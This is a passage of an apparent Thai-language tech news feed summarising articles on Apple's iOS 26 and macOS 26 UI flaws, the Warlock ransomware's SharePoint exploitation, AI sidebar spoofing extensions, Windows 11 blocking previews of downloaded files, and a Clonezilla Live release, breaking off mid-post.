• Apple กับคำถามที่ยังค้างคา: “ความใส่ใจในรายละเอียดหายไปไหน?”

    หากคุณเคยหลงรัก Apple เพราะความเรียบง่าย ความสวยงาม และความใส่ใจในรายละเอียดของผลิตภัณฑ์ คุณอาจรู้สึกเหมือนถูกหักหลังในยุคหลังๆ โดยเฉพาะเมื่อได้สัมผัสกับ iOS 26 และ macOS 26 ที่เต็มไปด้วยความไม่ลงตัว ความไม่สอดคล้อง และประสบการณ์ผู้ใช้ที่ชวนให้หงุดหงิด

    John Ozbay นักพัฒนาและนักออกแบบที่เคยหลงใหลใน Apple ได้เขียนบล็อกที่สะท้อนความผิดหวังอย่างลึกซึ้งต่อการเปลี่ยนแปลงของ Apple ในช่วง 8–10 ปีที่ผ่านมา เขายกตัวอย่างมากมายที่แสดงให้เห็นว่า Apple อาจละเลยหลักการออกแบบที่เคยเป็นหัวใจของแบรนด์ ไม่ว่าจะเป็นการจัดวาง search bar ที่ไม่สอดคล้องกันในแต่ละแอป การแจ้งเตือนที่รบกวนการทำงาน การออกแบบ UI ที่ไม่เหมาะกับ dark mode หรือแม้แต่การบังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่เต็มไปด้วยบั๊ก

    สิ่งที่น่าตกใจคือ Apple ไม่เพียงแค่ไม่แก้ไขปัญหาเก่า แต่ยังเพิ่มปัญหาใหม่ๆ เข้ามาอีก เช่น การออกแบบ “liquid glass” ที่ทำให้ข้อความใน iMessage อ่านยาก การจัดวาง UI ที่ไม่สอดคล้องกันระหว่างแอป และการทำให้ control center กลายเป็น “ดิสโก้บอล” ที่ใช้งานยาก

    ทั้งหมดนี้สะท้อนถึงคำถามสำคัญว่า Apple ยังให้ความสำคัญกับประสบการณ์ผู้ใช้อยู่หรือไม่ หรือกำลังหลงทางไปกับการออกแบบที่เน้นความฉูดฉาดมากกว่าความเรียบง่ายที่เคยเป็นจุดแข็ง

    ความเปลี่ยนแปลงในผลิตภัณฑ์ Apple
    iOS 26 และ macOS 26 มีปัญหาด้าน UI/UX มากมาย
    Search bar ถูกวางไว้ต่างกันในแต่ละแอป ทำให้ใช้งานยาก
    Reminders app รบกวนผู้ใช้ด้วย popup ขอสิทธิ์ซ้ำๆ
    Dark mode ใน Files app ทำให้บางองค์ประกอบมองไม่เห็น
    Share sheet และ Settings มีปัญหาในการแสดงผลไอคอน
    Safari และเบราว์เซอร์อื่นมีปัญหา viewport และปุ่มกระพริบ
    iMessage มีพื้นหลังที่ทำให้ข้อความอ่านยาก
    App Library แสดงไอคอนไม่ครบหรือไม่เสถียร

    ปัญหาด้านเทคโนโลยีและการบังคับใช้
    Apple บังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่มีบั๊ก
    การเปลี่ยน tab ใน Safari ต้องใช้สองขั้นตอนและมีเอฟเฟกต์รบกวน
    Liquid glass UI ไม่เหมาะกับหน้าจอขนาดเล็ก เช่น iPhone mini

    มุมมองจากนักพัฒนา
    John Ozbay และนักออกแบบหลายคนเริ่มหมดศรัทธาใน Apple
    Nielsen Norman Group ก็วิจารณ์ liquid glass ว่าเป็นการออกแบบที่ไม่เหมาะสม
    การออกแบบที่ไม่สอดคล้องกันสะท้อนถึงการขาดแนวทางร่วมของทีม

    https://blog.johnozbay.com/what-happened-to-apples-attention-to-detail.html
    🍎 Apple กับคำถามที่ยังค้างคา: “ความใส่ใจในรายละเอียดหายไปไหน?” หากคุณเคยหลงรัก Apple เพราะความเรียบง่าย ความสวยงาม และความใส่ใจในรายละเอียดของผลิตภัณฑ์ คุณอาจรู้สึกเหมือนถูกหักหลังในยุคหลังๆ โดยเฉพาะเมื่อได้สัมผัสกับ iOS 26 และ macOS 26 ที่เต็มไปด้วยความไม่ลงตัว ความไม่สอดคล้อง และประสบการณ์ผู้ใช้ที่ชวนให้หงุดหงิด John Ozbay นักพัฒนาและนักออกแบบที่เคยหลงใหลใน Apple ได้เขียนบล็อกที่สะท้อนความผิดหวังอย่างลึกซึ้งต่อการเปลี่ยนแปลงของ Apple ในช่วง 8–10 ปีที่ผ่านมา เขายกตัวอย่างมากมายที่แสดงให้เห็นว่า Apple อาจละเลยหลักการออกแบบที่เคยเป็นหัวใจของแบรนด์ ไม่ว่าจะเป็นการจัดวาง search bar ที่ไม่สอดคล้องกันในแต่ละแอป การแจ้งเตือนที่รบกวนการทำงาน การออกแบบ UI ที่ไม่เหมาะกับ dark mode หรือแม้แต่การบังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่เต็มไปด้วยบั๊ก สิ่งที่น่าตกใจคือ Apple ไม่เพียงแค่ไม่แก้ไขปัญหาเก่า แต่ยังเพิ่มปัญหาใหม่ๆ เข้ามาอีก เช่น การออกแบบ “liquid glass” ที่ทำให้ข้อความใน iMessage อ่านยาก การจัดวาง UI ที่ไม่สอดคล้องกันระหว่างแอป และการทำให้ control center กลายเป็น “ดิสโก้บอล” ที่ใช้งานยาก ทั้งหมดนี้สะท้อนถึงคำถามสำคัญว่า Apple ยังให้ความสำคัญกับประสบการณ์ผู้ใช้อยู่หรือไม่ หรือกำลังหลงทางไปกับการออกแบบที่เน้นความฉูดฉาดมากกว่าความเรียบง่ายที่เคยเป็นจุดแข็ง ✅ ความเปลี่ยนแปลงในผลิตภัณฑ์ Apple ➡️ iOS 26 และ macOS 26 มีปัญหาด้าน UI/UX มากมาย ➡️ Search bar ถูกวางไว้ต่างกันในแต่ละแอป ทำให้ใช้งานยาก ➡️ Reminders app รบกวนผู้ใช้ด้วย popup ขอสิทธิ์ซ้ำๆ ➡️ Dark mode ใน Files app ทำให้บางองค์ประกอบมองไม่เห็น ➡️ Share sheet และ Settings มีปัญหาในการแสดงผลไอคอน ➡️ Safari และเบราว์เซอร์อื่นมีปัญหา viewport และปุ่มกระพริบ ➡️ iMessage มีพื้นหลังที่ทำให้ข้อความอ่านยาก ➡️ App Library แสดงไอคอนไม่ครบหรือไม่เสถียร ✅ ปัญหาด้านเทคโนโลยีและการบังคับใช้ ➡️ Apple บังคับให้เบราว์เซอร์ third-party ใช้ WebKit ที่มีบั๊ก ➡️ การเปลี่ยน tab ใน Safari ต้องใช้สองขั้นตอนและมีเอฟเฟกต์รบกวน ➡️ Liquid glass UI ไม่เหมาะกับหน้าจอขนาดเล็ก เช่น iPhone mini ✅ มุมมองจากนักพัฒนา ➡️ John Ozbay และนักออกแบบหลายคนเริ่มหมดศรัทธาใน Apple ➡️ Nielsen Norman Group ก็วิจารณ์ liquid glass ว่าเป็นการออกแบบที่ไม่เหมาะสม ➡️ การออกแบบที่ไม่สอดคล้องกันสะท้อนถึงการขาดแนวทางร่วมของทีม https://blog.johnozbay.com/what-happened-to-apples-attention-to-detail.html
    0 Comments 0 Shares 30 Views 0 Reviews
  • Warlock Ransomware: จู่โจมองค์กรสหรัฐฯ ผ่านช่องโหว่ SharePoint โดยกลุ่มแฮกเกอร์จีน CamoFei

    ภัยคุกคามไซเบอร์ครั้งใหม่กำลังเขย่าโลกธุรกิจสหรัฐฯ เมื่อ Warlock ransomware ปรากฏตัวในเดือนมิถุนายน 2025 และถูกใช้ในการโจมตีองค์กรต่างๆ โดยอาศัยช่องโหว่ ToolShell zero-day ใน Microsoft SharePoint (CVE-2025-53770) ซึ่งสามารถเจาะระบบได้โดยไม่ต้องยืนยันตัวตน

    สิ่งที่ทำให้ Warlock แตกต่างจาก ransomware ทั่วไปคือความเชื่อมโยงกับกลุ่มแฮกเกอร์จีนสายข่าวกรอง เช่น CamoFei (หรือ ChamelGang) และ Storm-2603 ซึ่งเคยใช้เครื่องมือจารกรรมอย่าง Cobalt Strike และเทคนิค DLL sideloading ในการแทรกซึมระบบมาก่อน

    Warlock ถูกพบว่ามีลักษณะคล้ายกับ Anylock ransomware โดยใช้ extension .x2anylock และมีโครงสร้าง payload ที่ใกล้เคียงกัน บ่งชี้ว่าอาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก LockBit 3.0

    หนึ่งในเทคนิคที่น่ากังวลที่สุดคือการใช้ BYOVD (Bring Your Own Vulnerable Driver) โดยแฮกเกอร์นำ driver จาก Baidu Antivirus ปี 2016 ที่มีช่องโหว่มาใช้ร่วมกับ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” เพื่อปิดการทำงานของโปรแกรมป้องกันไวรัสในระบบเป้าหมาย

    การโจมตีครั้งนี้ไม่ใช่แค่การเรียกค่าไถ่ แต่ยังสะท้อนถึงการบูรณาการระหว่างกลุ่มแฮกเกอร์สายข่าวกรองกับกลุ่มอาชญากรรมไซเบอร์ ซึ่งอาจเป็นยุทธศาสตร์ใหม่ของการโจมตีระดับประเทศ

    ลักษณะของ Warlock ransomware
    ปรากฏตัวครั้งแรกในเดือนมิถุนายน 2025
    ใช้ช่องโหว่ CVE-2025-53770 ใน SharePoint
    เชื่อมโยงกับกลุ่มแฮกเกอร์จีน เช่น CamoFei และ Storm-2603

    เทคนิคการโจมตี
    ใช้ BYOVD ด้วย driver จาก Baidu Antivirus ปี 2016
    ใช้ certificate ปลอมจากนักพัฒนาชื่อ “coolschool”
    ใช้ DLL sideloading และ toolkit “Project AK47”

    ความสัมพันธ์กับ ransomware อื่น
    มีลักษณะคล้าย Anylock และ LockBit 3.0
    ใช้ extension .x2anylock ในการเข้ารหัสไฟล์
    อาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก ransomware เดิม

    กลุ่มเป้าหมาย
    องค์กรในสหรัฐฯ และหน่วยงานรัฐบาล
    ใช้ช่องโหว่ zero-day เพื่อเข้าถึงระบบโดยไม่ต้องยืนยันตัวตน
    มีการโจมตีแบบผสมระหว่างจารกรรมและเรียกค่าไถ่

    https://securityonline.info/warlock-ransomware-hits-us-firms-exploiting-sharepoint-zero-day-linked-to-chinas-camofei-apt/
    🧨 Warlock Ransomware: จู่โจมองค์กรสหรัฐฯ ผ่านช่องโหว่ SharePoint โดยกลุ่มแฮกเกอร์จีน CamoFei ภัยคุกคามไซเบอร์ครั้งใหม่กำลังเขย่าโลกธุรกิจสหรัฐฯ เมื่อ Warlock ransomware ปรากฏตัวในเดือนมิถุนายน 2025 และถูกใช้ในการโจมตีองค์กรต่างๆ โดยอาศัยช่องโหว่ ToolShell zero-day ใน Microsoft SharePoint (CVE-2025-53770) ซึ่งสามารถเจาะระบบได้โดยไม่ต้องยืนยันตัวตน สิ่งที่ทำให้ Warlock แตกต่างจาก ransomware ทั่วไปคือความเชื่อมโยงกับกลุ่มแฮกเกอร์จีนสายข่าวกรอง เช่น CamoFei (หรือ ChamelGang) และ Storm-2603 ซึ่งเคยใช้เครื่องมือจารกรรมอย่าง Cobalt Strike และเทคนิค DLL sideloading ในการแทรกซึมระบบมาก่อน Warlock ถูกพบว่ามีลักษณะคล้ายกับ Anylock ransomware โดยใช้ extension .x2anylock และมีโครงสร้าง payload ที่ใกล้เคียงกัน บ่งชี้ว่าอาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก LockBit 3.0 หนึ่งในเทคนิคที่น่ากังวลที่สุดคือการใช้ BYOVD (Bring Your Own Vulnerable Driver) โดยแฮกเกอร์นำ driver จาก Baidu Antivirus ปี 2016 ที่มีช่องโหว่มาใช้ร่วมกับ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” เพื่อปิดการทำงานของโปรแกรมป้องกันไวรัสในระบบเป้าหมาย การโจมตีครั้งนี้ไม่ใช่แค่การเรียกค่าไถ่ แต่ยังสะท้อนถึงการบูรณาการระหว่างกลุ่มแฮกเกอร์สายข่าวกรองกับกลุ่มอาชญากรรมไซเบอร์ ซึ่งอาจเป็นยุทธศาสตร์ใหม่ของการโจมตีระดับประเทศ ✅ ลักษณะของ Warlock ransomware ➡️ ปรากฏตัวครั้งแรกในเดือนมิถุนายน 2025 ➡️ ใช้ช่องโหว่ CVE-2025-53770 ใน SharePoint ➡️ เชื่อมโยงกับกลุ่มแฮกเกอร์จีน เช่น CamoFei และ Storm-2603 ✅ เทคนิคการโจมตี ➡️ ใช้ BYOVD ด้วย driver จาก Baidu Antivirus ปี 2016 ➡️ ใช้ certificate ปลอมจากนักพัฒนาชื่อ “coolschool” ➡️ ใช้ DLL sideloading และ toolkit “Project AK47” ✅ ความสัมพันธ์กับ ransomware อื่น ➡️ มีลักษณะคล้าย Anylock และ LockBit 3.0 ➡️ ใช้ extension .x2anylock ในการเข้ารหัสไฟล์ ➡️ อาจเป็นการรีแบรนด์หรือพัฒนาต่อยอดจาก ransomware เดิม ✅ กลุ่มเป้าหมาย ➡️ องค์กรในสหรัฐฯ และหน่วยงานรัฐบาล ➡️ ใช้ช่องโหว่ zero-day เพื่อเข้าถึงระบบโดยไม่ต้องยืนยันตัวตน ➡️ มีการโจมตีแบบผสมระหว่างจารกรรมและเรียกค่าไถ่ https://securityonline.info/warlock-ransomware-hits-us-firms-exploiting-sharepoint-zero-day-linked-to-chinas-camofei-apt/
    SECURITYONLINE.INFO
    Warlock Ransomware Hits US Firms Exploiting SharePoint Zero-Day, Linked to China’s CamoFei APT
    Symantec exposed Warlock ransomware (a probable Anylock rebrand) used by China-linked Storm-2603. It exploits the SharePoint zero-day and BYOVD to disable security and encrypt files with the .x2anylock extension.
    0 Comments 0 Shares 29 Views 0 Reviews
  • AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser

    SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง

    การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing

    SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ

    ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser

    ลักษณะของการโจมตี AI Sidebar Spoofing
    ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser
    หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI
    สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox

    ตัวอย่างการโจมตี
    ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต
    OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม
    reverse shell แฝงในคำสั่งติดตั้ง Homebrew

    จุดอ่อนของระบบ
    ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ
    ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม
    ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี

    การป้องกันจาก SquareX
    เสนอเครื่องมือ Browser Detection and Response (BDR)
    มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime
    เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี

    คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar
    อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ
    อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง
    ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล

    คำแนะนำเพิ่มเติม
    ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด
    ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง
    อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ

    https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    🕵️‍♂️ AI Sidebar Spoofing: SquareX เตือนภัยส่วนขยายปลอมที่แอบอ้างเป็น Sidebar ของ AI Browser SquareX บริษัทด้านความปลอดภัยเบราว์เซอร์ ได้เปิดเผยการโจมตีรูปแบบใหม่ที่เรียกว่า “AI Sidebar Spoofing” ซึ่งใช้ส่วนขยายเบราว์เซอร์ที่เป็นอันตรายในการปลอมแปลงหน้าต่าง Sidebar ของ AI browser เช่น Comet, Brave, Edge และ Firefox เพื่อหลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI จริง การโจมตีนี้อาศัยความไว้วางใจของผู้ใช้ที่มีต่อ AI browser ซึ่งมักใช้ Sidebar เป็นช่องทางหลักในการโต้ตอบกับ AI โดยผู้โจมตีจะสร้างส่วนขยายที่สามารถแสดง Sidebar ปลอมได้อย่างแนบเนียน เมื่อผู้ใช้พิมพ์คำถามหรือขอคำแนะนำ Sidebar ปลอมจะตอบกลับด้วยคำแนะนำที่แฝงคำสั่งอันตราย เช่น ลิงก์ฟิชชิ่ง, คำสั่ง reverse shell หรือ OAuth phishing SquareX ยกตัวอย่างกรณีศึกษาหลายกรณี เช่น การหลอกให้ผู้ใช้เข้าสู่เว็บไซต์ Binance ปลอมเพื่อขโมยคริปโต, การแนะนำเว็บไซต์แชร์ไฟล์ที่เป็น OAuth trap เพื่อเข้าถึง Gmail และ Google Drive, หรือการแนะนำคำสั่งติดตั้ง Homebrew ที่แฝง reverse shell เพื่อยึดเครื่องของเหยื่อ ที่น่ากังวลคือ ส่วนขยายเหล่านี้ใช้สิทธิ์พื้นฐานที่พบได้ทั่วไปในส่วนขยายยอดนิยม เช่น Grammarly หรือ password manager ทำให้ยากต่อการตรวจจับ และสามารถทำงานได้บนเบราว์เซอร์ทุกชนิดที่มี Sidebar AI โดยไม่จำกัดเฉพาะ AI browser ✅ ลักษณะของการโจมตี AI Sidebar Spoofing ➡️ ใช้ส่วนขยายเบราว์เซอร์ปลอมแปลง Sidebar ของ AI browser ➡️ หลอกผู้ใช้ให้ทำตามคำสั่งที่เป็นอันตรายโดยเข้าใจผิดว่าเป็นคำแนะนำจาก AI ➡️ สามารถทำงานได้บนเบราว์เซอร์ทั่วไปที่มี Sidebar AI เช่น Edge, Brave, Firefox ✅ ตัวอย่างการโจมตี ➡️ ลิงก์ฟิชชิ่งปลอมเป็น Binance เพื่อขโมยคริปโต ➡️ OAuth phishing ผ่านเว็บไซต์แชร์ไฟล์ปลอม ➡️ reverse shell แฝงในคำสั่งติดตั้ง Homebrew ✅ จุดอ่อนของระบบ ➡️ ส่วนขยายใช้สิทธิ์พื้นฐานที่พบได้ทั่วไป ทำให้ยากต่อการตรวจจับ ➡️ ไม่มีความแตกต่างด้านภาพหรือการทำงานระหว่าง Sidebar จริงกับ Sidebar ปลอม ➡️ ส่วนขยายสามารถแฝงตัวและรอจังหวะที่เหมาะสมในการโจมตี ✅ การป้องกันจาก SquareX ➡️ เสนอเครื่องมือ Browser Detection and Response (BDR) ➡️ มีระบบตรวจจับและวิเคราะห์พฤติกรรมส่วนขยายแบบ runtime ➡️ เสนอการตรวจสอบส่วนขยายทั้งองค์กรฟรี ‼️ คำเตือนสำหรับผู้ใช้งานเบราว์เซอร์ที่มี AI Sidebar ⛔ อย่าติดตั้งส่วนขยายจากแหล่งที่ไม่เชื่อถือ ⛔ อย่าทำตามคำแนะนำจาก Sidebar โดยไม่ตรวจสอบความถูกต้อง ⛔ ระวังคำสั่งที่เกี่ยวข้องกับการเข้าสู่ระบบ, การติดตั้งโปรแกรม หรือการแชร์ข้อมูล ‼️ คำแนะนำเพิ่มเติม ⛔ ใช้เบราว์เซอร์ที่มีระบบตรวจสอบส่วนขยายแบบละเอียด ⛔ ตรวจสอบสิทธิ์ของส่วนขยายก่อนติดตั้ง ⛔ อัปเดตเบราว์เซอร์และส่วนขยายให้เป็นเวอร์ชันล่าสุดเสมอ https://securityonline.info/ai-sidebar-spoofing-attack-squarex-uncovers-malicious-extensions-that-impersonate-ai-browser-sidebars/
    0 Comments 0 Shares 22 Views 0 Reviews
  • Windows 11 ปรับระบบความปลอดภัย: ปิดการแสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากเว็บ

    Microsoft ได้ออกอัปเดตใหม่สำหรับ Windows 11 ที่มุ่งเน้นการเพิ่มความปลอดภัยของผู้ใช้งาน โดยเฉพาะในส่วนของ File Explorer ซึ่งตอนนี้จะไม่แสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากอินเทอร์เน็ตโดยอัตโนมัติอีกต่อไป การเปลี่ยนแปลงนี้เกิดขึ้นจากการค้นพบช่องโหว่ที่อาจเปิดทางให้แฮกเกอร์ขโมยข้อมูลสำคัญ เช่น NTLM authentication hashes ผ่านการ preview ไฟล์ HTML ที่มีการอ้างอิงไปยัง path ภายนอก

    เมื่อผู้ใช้พยายามเปิด preview ไฟล์ที่มี “web mark” หรือถูกระบุว่ามาจากอินเทอร์เน็ต ระบบจะแสดงคำเตือนว่า “ไฟล์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ” และแนะนำให้เปิดไฟล์ด้วยความระมัดระวัง หากผู้ใช้มั่นใจว่าไฟล์ปลอดภัย ก็สามารถคลิกขวา เลือก Properties แล้วกด “Unblock” เพื่อเปิด preview ได้ตามปกติ

    การปรับปรุงนี้ครอบคลุม Windows 11, Windows 10 (รวมเวอร์ชัน ESU), Windows Server 2012/2012 R2/2016/2019/2025 และ Windows Server version 23H2

    การเปลี่ยนแปลงใน File Explorer
    ปิดการแสดง preview สำหรับไฟล์ที่ดาวน์โหลดจากเว็บ
    แสดงคำเตือนเมื่อพยายาม preview ไฟล์ที่มี “web mark”
    ผู้ใช้สามารถ “Unblock” ไฟล์เพื่อเปิด preview ได้

    เหตุผลด้านความปลอดภัย
    ป้องกันการรั่วไหลของ NTLM authentication hashes
    ช่องโหว่เกิดจากการ preview ไฟล์ HTML ที่อ้างอิง path ภายนอก
    ลดความเสี่ยงจากการเปิดไฟล์อันตรายโดยไม่ตั้งใจ

    ระบบที่ได้รับผลกระทบ
    Windows 11 และ Windows 10 ทุกเวอร์ชัน
    Windows Server 2012 ถึง 2025 รวมถึงเวอร์ชัน 23H2

    คำเตือนสำหรับผู้ใช้งาน
    อย่าเปิด preview ไฟล์จากอินเทอร์เน็ตโดยไม่ตรวจสอบแหล่งที่มา
    ไฟล์ HTML ที่มีการอ้างอิงภายนอกอาจเป็นช่องทางโจมตี
    การเปิด preview โดยไม่ “Unblock” อาจทำให้ระบบแสดงคำเตือนหรือปิดการทำงานบางส่วน

    คำแนะนำเพิ่มเติม
    ตรวจสอบแหล่งที่มาของไฟล์ก่อนเปิดใช้งาน
    ใช้ฟีเจอร์ “Unblock” เฉพาะเมื่อมั่นใจว่าไฟล์ปลอดภัย
    อัปเดตระบบให้เป็นเวอร์ชันล่าสุดเพื่อรับการป้องกันเต็มรูปแบบ

    https://securityonline.info/security-first-windows-11-disables-file-previews-for-web-downloads/
    🛡️ Windows 11 ปรับระบบความปลอดภัย: ปิดการแสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากเว็บ Microsoft ได้ออกอัปเดตใหม่สำหรับ Windows 11 ที่มุ่งเน้นการเพิ่มความปลอดภัยของผู้ใช้งาน โดยเฉพาะในส่วนของ File Explorer ซึ่งตอนนี้จะไม่แสดงตัวอย่างไฟล์ที่ดาวน์โหลดจากอินเทอร์เน็ตโดยอัตโนมัติอีกต่อไป การเปลี่ยนแปลงนี้เกิดขึ้นจากการค้นพบช่องโหว่ที่อาจเปิดทางให้แฮกเกอร์ขโมยข้อมูลสำคัญ เช่น NTLM authentication hashes ผ่านการ preview ไฟล์ HTML ที่มีการอ้างอิงไปยัง path ภายนอก เมื่อผู้ใช้พยายามเปิด preview ไฟล์ที่มี “web mark” หรือถูกระบุว่ามาจากอินเทอร์เน็ต ระบบจะแสดงคำเตือนว่า “ไฟล์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ” และแนะนำให้เปิดไฟล์ด้วยความระมัดระวัง หากผู้ใช้มั่นใจว่าไฟล์ปลอดภัย ก็สามารถคลิกขวา เลือก Properties แล้วกด “Unblock” เพื่อเปิด preview ได้ตามปกติ การปรับปรุงนี้ครอบคลุม Windows 11, Windows 10 (รวมเวอร์ชัน ESU), Windows Server 2012/2012 R2/2016/2019/2025 และ Windows Server version 23H2 ✅ การเปลี่ยนแปลงใน File Explorer ➡️ ปิดการแสดง preview สำหรับไฟล์ที่ดาวน์โหลดจากเว็บ ➡️ แสดงคำเตือนเมื่อพยายาม preview ไฟล์ที่มี “web mark” ➡️ ผู้ใช้สามารถ “Unblock” ไฟล์เพื่อเปิด preview ได้ ✅ เหตุผลด้านความปลอดภัย ➡️ ป้องกันการรั่วไหลของ NTLM authentication hashes ➡️ ช่องโหว่เกิดจากการ preview ไฟล์ HTML ที่อ้างอิง path ภายนอก ➡️ ลดความเสี่ยงจากการเปิดไฟล์อันตรายโดยไม่ตั้งใจ ✅ ระบบที่ได้รับผลกระทบ ➡️ Windows 11 และ Windows 10 ทุกเวอร์ชัน ➡️ Windows Server 2012 ถึง 2025 รวมถึงเวอร์ชัน 23H2 ‼️ คำเตือนสำหรับผู้ใช้งาน ⛔ อย่าเปิด preview ไฟล์จากอินเทอร์เน็ตโดยไม่ตรวจสอบแหล่งที่มา ⛔ ไฟล์ HTML ที่มีการอ้างอิงภายนอกอาจเป็นช่องทางโจมตี ⛔ การเปิด preview โดยไม่ “Unblock” อาจทำให้ระบบแสดงคำเตือนหรือปิดการทำงานบางส่วน ‼️ คำแนะนำเพิ่มเติม ⛔ ตรวจสอบแหล่งที่มาของไฟล์ก่อนเปิดใช้งาน ⛔ ใช้ฟีเจอร์ “Unblock” เฉพาะเมื่อมั่นใจว่าไฟล์ปลอดภัย ⛔ อัปเดตระบบให้เป็นเวอร์ชันล่าสุดเพื่อรับการป้องกันเต็มรูปแบบ https://securityonline.info/security-first-windows-11-disables-file-previews-for-web-downloads/
    SECURITYONLINE.INFO
    Security First: Windows 11 Disables File Previews for Web Downloads
    Microsoft disabled File Explorer previews for web-downloaded files to block an NTLM hash leak vulnerability, prioritizing security over convenience.
    0 Comments 0 Shares 18 Views 0 Reviews
  • “Clonezilla Live 3.3.0-33 มาแล้ว! รองรับการโคลน MTD และ eMMC พร้อมเครื่องมือใหม่เพียบ”

    Clonezilla Live เวอร์ชัน 3.3.0-33 เพิ่งเปิดตัว โดยเป็นระบบ live OS สำหรับการโคลนดิสก์และพาร์ทิชันที่อิงจาก Debian และใช้ Linux kernel 6.16 จุดเด่นของเวอร์ชันนี้คือการเพิ่มการรองรับการโคลนอุปกรณ์ MTD block และ eMMC boot ในโหมดผู้เชี่ยวชาญ (expert mode) ซึ่งเป็นประโยชน์มากสำหรับงาน embedded system และอุปกรณ์ IoT

    นอกจากนี้ยังมีเครื่องมือใหม่ชื่อว่า ocs-blkdev-sorter ที่ช่วยให้ udev สร้าง alias block device ใน /dev/ocs-disks/ ได้สะดวกขึ้น และ ocs-live-time-sync สำหรับซิงค์เวลาในระบบผ่าน ocs-live-netcfg

    ยังมีการเพิ่มตัวเลือก -uoab ใน ocs-sr และ ocs-live-feed-img เพื่อให้เลือก alias block device ได้จาก UI แบบข้อความ และเครื่องมือใหม่อีกหลายตัว เช่น ocs-cmd-screen-sample, ocs-live-gen-ubrd, และ ocs-blk-dev-info ที่ให้ข้อมูล block device ในรูปแบบ JSON

    ด้านระบบยังมีการเพิ่มแพ็กเกจสำคัญ เช่น atd, cron, upower, และ dhcpcd-base รวมถึงปรับปรุงการตั้งค่า locale และ keymap ให้เลือกได้จาก shell login โดยใช้ fbterm เป็นค่าเริ่มต้น

    สุดท้าย Clonezilla Live 3.3.0-33 ยังอัปเดตสคริปต์ต่าง ๆ เช่น ocs-iso-2-onie, ocs-cvt-dev, และ ocs-live-swap-kernel เพื่อรองรับการใช้งานที่ซับซ้อนมากขึ้น พร้อมปรับปรุงประสิทธิภาพและแก้บั๊กหลายจุด

    ความสามารถใหม่ใน Clonezilla Live 3.3.0-33
    รองรับการโคลน MTD block และ eMMC boot device ใน expert mode
    เพิ่ม ocs-blkdev-sorter สำหรับสร้าง alias block device
    เพิ่ม ocs-live-time-sync สำหรับซิงค์เวลา
    เพิ่ม ocs-cmd-screen-sample และ ocs-live-gen-ubrd
    เพิ่ม ocs-blk-dev-info สำหรับแสดงข้อมูล block device แบบ JSON

    การปรับปรุงระบบและ UI
